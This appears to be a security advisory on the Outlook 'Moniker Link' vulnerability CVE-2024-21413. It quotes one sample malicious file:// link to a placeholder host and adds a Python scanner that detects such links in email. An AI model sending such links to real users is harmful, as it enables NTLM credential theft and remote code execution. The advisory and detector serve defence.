UGCERT has learnt of a critical Microsoft Outlook vulnerability, CVE-2024-21413, and urges operators and the general public to secure their systems against ongoing cyberattacks due to this vulnerability.
The vulnerability was discovered by Check Point researcher Haifei Li. It stems from improper input validation in certain Outlook versions, allowing attackers to execute remote code by embedding malicious links in emails.
This flaw enables threat actors to bypass Protected View, a security feature designed to open Office files in read-only mode and block harmful content. Instead, malicious Office documents are launched in editing mode, increasing the risk of exploitation.
When Microsoft patched this vulnerability a year ago, it warned that the Preview Pane can serve as an attack vector—meaning users can be compromised simply by previewing a malicious Office document.
How Attackers Exploit the Vulnerability
Dubbed Moniker Link by Check Point, this exploit takes advantage of Outlook’s handling of certain URLs. By embedding links using the file:// protocol and appending an exclamation mark (!) followed by random text to the file extension, attackers can evade built-in Outlook security measures.
Example of a malicious link:
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
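For mail triage, the link pattern described above can be checked in message bodies before delivery. The following is an added example, not code from UGCERT, Check Point or Microsoft: it parses a message, collects href/src values from its HTML parts and reports file links that carry an exclamation mark after a file extension. The function names and the sample message are constructed for illustration; matching bare UNC paths and a URL-encoded "%21" are added precautions that go beyond the single link quoted in the advisory.

```python
import re
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import unquote

# A file: URL, or a bare UNC path (assumption: flagged as a precaution).
FILE_LINK = re.compile(r"^\s*(file:|\\\\)", re.IGNORECASE)
# A file extension immediately followed by "!", as in "test.rtf!something".
BANG_AFTER_EXT = re.compile(r"\.[A-Za-z0-9]{1,8}!")

class LinkCollector(HTMLParser):
    """Collects href/src attribute values from an HTML body."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        self.links += [v for k, v in attrs if k in ("href", "src") and v]

def moniker_links_in_html(html_body):
    """Return the raw link values that match the advisory's pattern."""
    collector = LinkCollector()
    collector.feed(html_body)
    collector.close()
    hits = []
    for raw in collector.links:
        url = unquote(raw)  # also catches "%21" written in place of "!"
        if FILE_LINK.match(url) and BANG_AFTER_EXT.search(url):
            hits.append(raw)
    return hits

def scan_message(raw_message):
    """Scan every text/html part of an RFC 5322 message string."""
    msg = message_from_string(raw_message, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            hits += moniker_links_in_html(part.get_content())
    return hits

# Constructed sample message; the first link is the one quoted in the advisory.
SAMPLE_EML = (
    "From: sender@example.org\nSubject: constructed sample\n"
    "MIME-Version: 1.0\nContent-Type: text/html; charset=utf-8\n\n"
    r'<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>' "\n"
    '<a href="https://example.org/notes.rtf">notes</a>\n'
)

if __name__ == "__main__":
    print(scan_message(SAMPLE_EML))
```

A hit is a reason to quarantine the message for review; it does not replace applying the patch.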
Affected Microsoft products include:
Microsoft Office LTSC 2021
Microsoft 365 Apps for Enterprise
Microsoft Outlook 2016
Microsoft Office 2019
Successful exploitation can lead to NTLM credential theft and remote code execution, giving attackers full control over affected systems.
How to Protect Your Organization
To mitigate the risk posed by this flaw, organizations should:
✔ Apply Microsoft’s security patches immediately
✔ Monitor network traffic for signs of exploitation
✔ Educate employees on phishing and malicious email threats
✔ Restrict NTLM authentication where possible
With active attacks underway, swift action is essential to prevent further compromises. Stay vigilant, update your systems, and reinforce cybersecurity best practices to safeguard against this evolving threat.